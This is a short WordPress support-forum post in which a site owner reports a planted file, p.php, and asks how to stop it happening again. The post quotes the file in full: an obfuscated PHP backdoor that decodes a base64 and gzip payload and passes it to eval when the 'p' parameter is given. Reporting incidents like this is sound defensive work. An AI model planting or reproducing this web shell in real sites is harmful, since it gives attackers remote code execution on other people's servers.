WordPress 2.7 Vulnerability?
-
Hello all! There’s a problem I’ve got with the new WordPress in that I just found this file:
<?php if(isset($_GET[‘p’])){eval(gzinflate(base64_decode(‘fY9dq4JAEIb/yiJyNJDVvk+FRMQWwUljXbuJWGwdcMFWyS3q358tu/Zqvp73nRlbFChE4n4ruVRSu73FJ29AV7V2bVF4aJ3Sv/j
AuAkesgqt67nvT39xP5jhwRAPRoGfv9RdybG/rEML65u8ujbfEnZyaufcw9ZPo0zf+IISVQ5mmBB6JPTktJFHqz0xZMfyQ5wwDwUdBCUspRGjqyjZEOqhfgfLdnsSp8ZwYhztPNNZ+GHhCeJNfqWirBpoa3hk
pXvJGpiMeA7tF2+duRmeUi/+AQ==’)));}?>called p.php in my wordpress directory. It was placed there on the 14th. Our site went down today at roughly 8am because of several hundred computers all going to:
/p.php?p=1-3897
/p.php?p=1-2910etc.
Any ideas on how to make sure this issue won’t happen again? I’ve since moved p.php to a directory not accessible via the web.
Thanks!
- The topic ‘WordPress 2.7 Vulnerability?’ is closed to new replies.